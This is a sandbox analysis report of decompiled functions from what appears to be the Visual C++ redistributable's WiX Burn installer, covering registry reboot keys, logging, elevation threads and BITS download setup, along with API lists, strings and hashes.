                                                                          				_push(E00023C30( *((intOrPtr*)(_t75 + 8))));
                                                                          				_push(E00024224(_a16));
                                                                          				_push(E00024257(_a12));
                                                                          				E0001550F(2, 0x20000174,  *((intOrPtr*)(_t75 + 0x50)));
                                                                          				_t78 = _t77 + 0x18;
                                                                          				if(_a16 != 0) {
                                                                          					_t65 = E00011F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_t75 + 0x50)));
                                                                          					_t78 = _t78 + 0xc;
                                                                          					if(_t65 < 0) {
                                                                          						L3:
                                                                          						_push("Failed to write volatile reboot required registry key.");
                                                                          						E0005012F();
                                                                          						_t68 = _t65;
                                                                          					} else {
                                                                          						_t65 = E00050AD5(_t68,  *((intOrPtr*)(_t75 + 0x4c)), _v16, 0x20006, 1, 0,  &_v12, 0);
                                                                          						if(_t65 < 0) {
                                                                          							goto L3;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_a12 != 0) {
                                                                          					_t74 = E00050E3F( *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0x20006,  &_v8);
                                                                          					__eflags = _t74;
                                                                          					if(_t74 >= 0) {
                                                                          						goto L14;
                                                                          					} else {
                                                                          						_push("Failed to open registration key.");
                                                                          						goto L16;
                                                                          					}
                                                                          				} else {
                                                                          					if(_a20 == 1 || _a20 == 2) {
                                                                          						E0003840F(_t68, _t75);
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t75 + 0x9c)) != 0) {
                                                                          						E0001EEF9(_t68, _t75);
                                                                          					}
                                                                          					_t19 = _t75 + 0x94; // 0x95
                                                                          					E0001EE0F(_a8, _t19);
                                                                          					_t74 = E00050B49(_t68,  *((intOrPtr*)(_t75 + 0x4c)),  *((intOrPtr*)(_t75 + 0x50)), 0, 0);
                                                                          					if(_t74 == 0x80070002 || _t74 >= 0) {
                                                                          						E0002A66C(_t68, _t72,  *_t75,  *((intOrPtr*)(_t75 + 0x10)));
                                                                          						L14:
                                                                          						__eflags = _a16 - 2;
                                                                          						_t74 = E0001F09D(_t72, _a16 - 2, _t75, _v8, _a12, 0 | _a16 == 0x00000002);
                                                                          						__eflags = _t74;
                                                                          						if(_t74 < 0) {
                                                                          							_push("Failed to update resume mode.");
                                                                          							L16:
                                                                          							_push(_t74);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						E0005012F(_t74, "Failed to delete registration key: %ls",  *((intOrPtr*)(_t75 + 0x50)));
                                                                          					}
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					RegCloseKey(_v12);
                                                                          					_v12 = _v12 & 0x00000000;
                                                                          				}
                                                                          				if(_v16 != 0) {
                                                                          					E000554EF(_v16);
                                                                          				}
                                                                          				return _t74;
                                                                          			}














                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 0002054A
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 00020559
                                                                            • Part of subcall function 00050AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,00020491,?,00000000,00020006), ref: 00050AFA
                                                                          Strings
                                                                          • Failed to update resume mode., xrefs: 0002052E
                                                                          • %ls.RebootRequired, xrefs: 00020467
                                                                          • Failed to open registration key., xrefs: 00020591
                                                                          • Failed to write volatile reboot required registry key., xrefs: 00020495
                                                                          • Failed to delete registration key: %ls, xrefs: 000204F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Create
                                                                          • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
                                                                          • API String ID: 359002179-2517785395
                                                                          • Opcode ID: 63e6d6c7bee54bb067c252bb1abe62458f5deebb253537830981789055ac7733
                                                                          • Instruction ID: 597f4d54871c8ea76cd4fa09b8e4b8b97c66986e68332780d752bd800b75facd
                                                                          • Opcode Fuzzy Hash: 63e6d6c7bee54bb067c252bb1abe62458f5deebb253537830981789055ac7733
                                                                          • Instruction Fuzzy Hash: E941A231900728FBDF22AFA1EC02EEF7BBAAF40311F144469FA4562053D7729A54DB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 87%
                                                                          			E0005041B(void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                          				char _v8;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				intOrPtr* _t17;
                                                                          				void* _t24;
                                                                          				void* _t26;
                                                                          				intOrPtr _t27;
                                                                          				intOrPtr _t30;
                                                                          				void* _t41;
                                                                          				void* _t42;
                                                                          				void* _t44;
                                                                          
                                                                          				_t42 = __edi;
                                                                          				_t41 = __edx;
                                                                          				_t40 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = 0;
                                                                          				EnterCriticalSection(0x7b60c);
                                                                          				_t17 = _a16;
                                                                          				if(_t17 == 0 ||  *_t17 == 0) {
                                                                          					_t44 = E00012D79(_t40, _a4, _a8, 0x7b604);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_t44 = E00013446(_t40,  *0x7b604,  &_v8);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_t44 = E00014013(_v8, 0);
                                                                          					if(_t44 < 0) {
                                                                          						goto L21;
                                                                          					}
                                                                          					_push(0);
                                                                          					_push(0x80);
                                                                          					_t24 = 2;
                                                                          					_t40 = 4;
                                                                          					_t25 =  !=  ? _t40 : _t24;
                                                                          					_t26 = CreateFileW( *0x7b604, 0x40000000, 1, 0,  !=  ? _t40 : _t24, ??, ??);
                                                                          					 *0x7a774 = _t26;
                                                                          					if(_t26 != 0xffffffff) {
                                                                          						L11:
                                                                          						if(_a20 != 0) {
                                                                          							SetFilePointer(_t26, 0, 0, 2);
                                                                          						}
                                                                          						goto L13;
                                                                          					}
                                                                          					_t44 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                          					if(_t44 >= 0) {
                                                                          						_t26 =  *0x7a774; // 0xffffffff
                                                                          						goto L11;
                                                                          					}
                                                                          					E000137D3(_t34, "logutil.cpp", 0x81, _t44);
                                                                          					goto L21;
                                                                          				} else {
                                                                          					_t44 = E00012DE0(_t40, _a4, _a8, _a12, _t17, 0x7b604, 0x7a774);
                                                                          					if(_t44 < 0) {
                                                                          						L21:
                                                                          						LeaveCriticalSection(0x7b60c);
                                                                          						if(_v8 != 0) {
                                                                          							E000554EF(_v8);
                                                                          						}
                                                                          						return _t44;
                                                                          					} else {
                                                                          						L13:
                                                                          						if(_a24 != 0) {
                                                                          							E000501F0(0, _t41, _t42, _t44);
                                                                          						}
                                                                          						_t27 =  *0x7b608; // 0x0
                                                                          						if(_t27 != 0) {
                                                                          							E00050658(_t40, _t41, _t27);
                                                                          							_t30 =  *0x7b608; // 0x0
                                                                          							if(_t30 != 0) {
                                                                          								E000554EF(_t30);
                                                                          								 *0x7b608 = 0;
                                                                          							}
                                                                          						}
                                                                          						if(_a28 == 0) {
                                                                          							L20:
                                                                          							 *0x7b634 = 0;
                                                                          							goto L21;
                                                                          						} else {
                                                                          							_t44 = E000121A5(_a28,  *0x7b604, 0);
                                                                          							if(_t44 < 0) {
                                                                          								goto L21;
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(0007B60C,00000000,?,?,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0005042B
                                                                          • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,0007B604,?,00015407,00000000,Setup), ref: 000504CC
                                                                          • GetLastError.KERNEL32(?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000504DC
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00050515
                                                                            • Part of subcall function 00012DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00012F1F
                                                                          • LeaveCriticalSection.KERNEL32(0007B60C,?,?,0007B604,?,00015407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 0005056E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 4111229724-637279948
                                                                          • Opcode ID: 62a092bb9782139ce1a856c10834251643a88a05907092470fc3d27245c37fd0
                                                                          • Instruction ID: ccd8aafbdb40b3a8d1197b991dba696e492785909a7cbd321ed858fad3de854d
                                                                          • Opcode Fuzzy Hash: 62a092bb9782139ce1a856c10834251643a88a05907092470fc3d27245c37fd0
                                                                          • Instruction Fuzzy Hash: 07316671E01B15AFEB21AF61DC46FAF36A8EB00752F004125FF04AA161E73DDD949B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E0002D01A(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr* _a52, intOrPtr* _a56) {
                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                          				char _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				char _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				intOrPtr _v96;
                                                                          				void _v100;
                                                                          				void* __edi;
                                                                          				intOrPtr _t76;
                                                                          				char _t77;
                                                                          				intOrPtr _t85;
                                                                          				void* _t86;
                                                                          				intOrPtr _t87;
                                                                          				void* _t88;
                                                                          				intOrPtr _t89;
                                                                          				void* _t90;
                                                                          
                                                                          				E0003F670(_t86,  &_v100, 0, 0x2c);
                                                                          				E0003F670(_t86,  &_v56, 0, 0x2c);
                                                                          				_t77 = _a4;
                                                                          				_v96 = _a12;
                                                                          				_t85 = _a40;
                                                                          				_t87 = _a32;
                                                                          				_t89 = _a36;
                                                                          				_v80 = _a20;
                                                                          				_v76 = _a24;
                                                                          				_v52 = _a8;
                                                                          				_v48 = _a44;
                                                                          				_v44 = _a48;
                                                                          				_v40 = _a16;
                                                                          				_v100 = _t77;
                                                                          				_v56 = _t77;
                                                                          				_v36 = _a20;
                                                                          				_v32 = _a24;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t76 = _a28;
                                                                          				_v72 = _t76;
                                                                          				_v68 = _t87;
                                                                          				_v64 = _t89;
                                                                          				_v60 = _t85;
                                                                          				_v28 = _t76;
                                                                          				_v24 = _t87;
                                                                          				_v20 = _t89;
                                                                          				_v16 = _t85;
                                                                          				_t88 = CreateThread(0, 0, E0002AB3C,  &_v100, 0, 0);
                                                                          				if(_t88 != 0) {
                                                                          					_t90 = E00024FB3(0, _t85, _a8, E0002C59C,  &_v56,  &_v12);
                                                                          					if(_t90 >= 0) {
                                                                          						E0002CCF4(0, _t88, _v12);
                                                                          						 *_a52 = _v12;
                                                                          						 *_a56 = _v8;
                                                                          					} else {
                                                                          						_push("Failed to pump messages in child process.");
                                                                          						_push(_t90);
                                                                          						E0005012F();
                                                                          					}
                                                                          					CloseHandle(_t88);
                                                                          				} else {
                                                                          					_t93 =  <=  ? GetLastError() : _t71 & 0x0000ffff | 0x80070000;
                                                                          					_t90 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t71 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "elevation.cpp", 0x45c, _t90);
                                                                          					_push("Failed to create elevated cache thread.");
                                                                          					_push(_t90);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t90;
                                                                          			}
                                                                          0x0002d122
                                                                          0x0002d128
                                                                          0x0002d145
                                                                          0x0002d0c4
                                                                          0x0002d0d5
                                                                          0x0002d0df
                                                                          0x0002d0ed
                                                                          0x0002d0f2
                                                                          0x0002d0f7
                                                                          0x0002d0f8
                                                                          0x0002d0fe
                                                                          0x0002d153

                                                                          APIs
                                                                          • CreateThread.KERNEL32 ref: 0002D0B8
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0002D0C4
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0002D145
                                                                          Strings
                                                                          • elevation.cpp, xrefs: 0002D0E8
                                                                          • Failed to create elevated cache thread., xrefs: 0002D0F2
                                                                          • Failed to pump messages in child process., xrefs: 0002D11C
                                                                          • @Met, xrefs: 0002D0C4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastThread
                                                                          • String ID: @Met$Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                          • API String ID: 747004058-2787839274
                                                                          • Opcode ID: a9f3e1c80eb702070fb2b2d9344b3953040e9402ba85afcc3bd3678c36c8ed28
                                                                          • Instruction ID: 1de67f96b1780a0afb7a6cddca15015a6eee26aa10d3b0f2e2b0fd42554fa4cf
                                                                          • Opcode Fuzzy Hash: a9f3e1c80eb702070fb2b2d9344b3953040e9402ba85afcc3bd3678c36c8ed28
                                                                          • Instruction Fuzzy Hash: 7941E6B5E01219AFDB05DFA9D8819EEBBF9EF48310F10412AF908E7341D774AD408BA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E0001F69D(intOrPtr _a4, intOrPtr* _a8) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* _t46;
                                                                          				void* _t48;
                                                                          				void* _t50;
                                                                          				intOrPtr* _t53;
                                                                          				void* _t58;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          
                                                                          				_t61 = _a4;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_v20 = 0;
                                                                          				if(E00011F20( &_v16, L"%ls.RebootRequired",  *((intOrPtr*)(_a4 + 0x50))) >= 0) {
                                                                          					if(E00050E3F( *((intOrPtr*)(_t61 + 0x4c)), _v16, 1,  &_v12) < 0) {
                                                                          						_t65 = E00050E3F( *((intOrPtr*)(_t61 + 0x4c)),  *((intOrPtr*)(_t61 + 0x50)), 1,  &_v8);
                                                                          						if(_t65 == 0x80070002 || _t65 == 0x80070003) {
                                                                          							 *_a8 = 0;
                                                                          							goto L23;
                                                                          						} else {
                                                                          							if(_t65 >= 0) {
                                                                          								_t66 = E00050EEC(_t58, _v8, L"Resume",  &_v20);
                                                                          								if(_t66 != 0x80070002) {
                                                                          									if(_t66 >= 0) {
                                                                          										_t46 = _v20 - 1;
                                                                          										if(_t46 == 0) {
                                                                          											 *_a8 = 2;
                                                                          										} else {
                                                                          											_t48 = _t46 - 1;
                                                                          											if(_t48 == 0) {
                                                                          												 *_a8 = 5;
                                                                          											} else {
                                                                          												_t50 = _t48 - 1;
                                                                          												if(_t50 == 0) {
                                                                          													 *_a8 = 6;
                                                                          												} else {
                                                                          													_t53 = _a8;
                                                                          													if(_t50 == 1) {
                                                                          														 *_t53 = 4;
                                                                          													} else {
                                                                          														 *_t53 = 1;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L24;
                                                                          									}
                                                                          									_push("Failed to read Resume value.");
                                                                          									goto L2;
                                                                          								}
                                                                          								 *_a8 = 1;
                                                                          								goto L23;
                                                                          							} else {
                                                                          								_push("Failed to open registration key.");
                                                                          								goto L2;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						 *_a8 = 3;
                                                                          						L23:
                                                                          						_t66 = 0;
                                                                          						goto L24;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format pending restart registry key to read.");
                                                                          					L2:
                                                                          					_push(_t66);
                                                                          					E0005012F();
                                                                          					L24:
                                                                          					if(_v8 != 0) {
                                                                          						RegCloseKey(_v8);
                                                                          						_v8 = 0;
                                                                          					}
                                                                          					if(_v12 != 0) {
                                                                          						RegCloseKey(_v12);
                                                                          						_v12 = 0;
                                                                          					}
                                                                          					if(_v16 != 0) {
                                                                          						E000554EF(_v16);
                                                                          					}
                                                                          					return _t66;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0001F7CD
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0001F7DA
                                                                          Strings
                                                                          • Resume, xrefs: 0001F741
                                                                          • %ls.RebootRequired, xrefs: 0001F6BA
                                                                          • Failed to open registration key., xrefs: 0001F736
                                                                          • Failed to format pending restart registry key to read., xrefs: 0001F6D1
                                                                          • Failed to read Resume value., xrefs: 0001F763
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                          • API String ID: 3535843008-3890505273
                                                                          • Opcode ID: 681c01e27192e6115e263c5c7641085dea6e0f90c8aa9e673ee72a1a7b429a4b
                                                                          • Instruction ID: 0cdad8954a3a3261bd9bc49b35c4d8daecba35f2124a6caefb254d6e9a16e3ee
                                                                          • Opcode Fuzzy Hash: 681c01e27192e6115e263c5c7641085dea6e0f90c8aa9e673ee72a1a7b429a4b
                                                                          • Instruction Fuzzy Hash: 1F41757690411AEFCB119F98C881AFDBBB5FF05310F258176F914AB291D372AE81DB81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E0002A7FA(void* __eflags, intOrPtr _a4, intOrPtr _a8, short* _a12) {
                                                                          				short* _v8;
                                                                          				short* _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				int _t43;
                                                                          				intOrPtr _t44;
                                                                          				intOrPtr _t45;
                                                                          				intOrPtr _t49;
                                                                          				void* _t53;
                                                                          
                                                                          				_t44 = _a8;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if(E00011C57(_t44, 0x7fffffff,  &_v20) >= 0) {
                                                                          					_t53 = E00011C57(_a12, 0x7fffffff,  &_v16);
                                                                          					if(_t53 >= 0) {
                                                                          						_t45 = _v16;
                                                                          						_t49 = _v20;
                                                                          						if(_t49 < _t45 + 3) {
                                                                          							L20:
                                                                          							return _t53;
                                                                          						}
                                                                          						_t50 = _t49 - _t45;
                                                                          						if(CompareStringW(0, 1, _t44 + (_t49 - _t45) * 2, 0xffffffff, _a12, 0xffffffff) != 2) {
                                                                          							L16:
                                                                          							if(_v12 != 0) {
                                                                          								E000554EF(_v12);
                                                                          							}
                                                                          							if(_v8 != 0) {
                                                                          								E000554EF(_v8);
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          						if(E000121A5( &_v8, _t44, _t50) >= 0) {
                                                                          							_t51 = L"WixBundleLastUsedSource";
                                                                          							_t53 = E0001738E(_t45, _a4, L"WixBundleLastUsedSource",  &_v12);
                                                                          							if(_t53 < 0) {
                                                                          								if(_t53 != 0x80070490) {
                                                                          									L13:
                                                                          									_t53 = E000180F6(_a4, _t51, _v8, 0);
                                                                          									if(_t53 >= 0) {
                                                                          										goto L16;
                                                                          									}
                                                                          									_push("Failed to set last source.");
                                                                          									L15:
                                                                          									_push(_t53);
                                                                          									E0005012F();
                                                                          									goto L16;
                                                                          								}
                                                                          								_t43 = 3;
                                                                          								_t53 = 0;
                                                                          								L12:
                                                                          								if(_t43 == 2) {
                                                                          									goto L16;
                                                                          								}
                                                                          								goto L13;
                                                                          							}
                                                                          							_t43 = CompareStringW(0, 1, _v8, 0xffffffff, _v12, 0xffffffff);
                                                                          							goto L12;
                                                                          						}
                                                                          						_push("Failed to trim source folder.");
                                                                          						goto L15;
                                                                          					}
                                                                          					_push("Failed to determine length of relative path.");
                                                                          					goto L15;
                                                                          				}
                                                                          				_push("Failed to determine length of source path.");
                                                                          				goto L15;
                                                                          			}













                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                          • API String ID: 0-660234312
                                                                          • Opcode ID: 3539058162c234a58944b36688a966e591b4cc35855998125278dafc5fd618be
                                                                          • Instruction ID: 1952d7eb2d27a9cebf6aadb0508c0b13839e47c4c0454b8eea1add657dd40757
                                                                          • Opcode Fuzzy Hash: 3539058162c234a58944b36688a966e591b4cc35855998125278dafc5fd618be
                                                                          • Instruction Fuzzy Hash: E531E832E00639BBDF219A54DC05EEFB7B9AF05720F114266F920B61D1EF319E819791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00070A84,00000000,00000017,00070A94,?,?,00000000,00000000,?,?,?,?,?,0003DCAE,00000000,00000000), ref: 0003D6AF
                                                                          Strings
                                                                          • WixBurn, xrefs: 0003D6DA
                                                                          • Failed to set notification flags for BITS job., xrefs: 0003D701
                                                                          • Failed to set progress timeout., xrefs: 0003D719
                                                                          • Failed to create BITS job., xrefs: 0003D6E9
                                                                          • Failed to create IBackgroundCopyManager., xrefs: 0003D6BB
                                                                          • Failed to set BITS job to foreground., xrefs: 0003D730
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                          • API String ID: 542301482-468763447
                                                                          • Opcode ID: 55cfaeca5e6276db9cc0df2986d23dfe55dfc768a1809ef6f1899a6da6c4f723
                                                                          • Instruction ID: 5236b220ee24765c38343b9456ef675973948634206fee9229e811c276a7cf60
                                                                          • Opcode Fuzzy Hash: 55cfaeca5e6276db9cc0df2986d23dfe55dfc768a1809ef6f1899a6da6c4f723
                                                                          • Instruction Fuzzy Hash: F331A431F40616EFD716CF64D856EAFBBB8EF48710F10415AE909EB350DA74AC018B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E0003D12C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				char _v16;
                                                                          				signed int _v24;
                                                                          				char _v28;
                                                                          				char _v32;
                                                                          				void* _t50;
                                                                          				char _t69;
                                                                          				signed int _t70;
                                                                          				intOrPtr _t71;
                                                                          				void* _t72;
                                                                          
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t71 = _a4;
                                                                          				WaitForSingleObject( *(_t71 + 0xc), 0xffffffff);
                                                                          				ReleaseMutex( *(_t71 + 0xc));
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t69 = 2;
                                                                          				_push(_a12);
                                                                          				_v32 = _t69;
                                                                          				_v28 = 1;
                                                                          				_v24 = (( *( *((intOrPtr*)(_t71 + 0x10)) + 0x219) & 0x000000ff) + ( *( *((intOrPtr*)(_t71 + 0x10)) + 0x218) & 0x000000ff) >> 0x00000001 & 0x000000ff) * 0x64 / 0xff;
                                                                          				_push( &_v32);
                                                                          				if(_a8() == _t69) {
                                                                          					WaitForSingleObject( *(_t71 + 0xc), 0xffffffff);
                                                                          					 *((char*)( *((intOrPtr*)(_t71 + 0x10)) + 2)) = 1;
                                                                          					 *((char*)( *((intOrPtr*)(_t71 + 0x10)) + 3)) = 1;
                                                                          					ReleaseMutex( *(_t71 + 0xc));
                                                                          					SetEvent( *(_t71 + 8));
                                                                          				}
                                                                          				_t50 = E0003CF56(_t71,  &_v12,  &_v8,  &_v16);
                                                                          				_t70 = _v8;
                                                                          				_t72 = _t50;
                                                                          				if(_t72 >= 0) {
                                                                          					__eflags = _v12 - 0x1070001;
                                                                          					if(__eflags == 0) {
                                                                          						_t72 = E0003D047(__eflags, _a4, _t70, _a8, _a12);
                                                                          						__eflags = _t72;
                                                                          						if(_t72 < 0) {
                                                                          							_push("Failed to send files in use message from netfx chainer.");
                                                                          							goto L7;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get message from netfx chainer.");
                                                                          					L7:
                                                                          					_push(_t72);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_t70 != 0) {
                                                                          					E00013999(_t70);
                                                                          				}
                                                                          				return _t72;
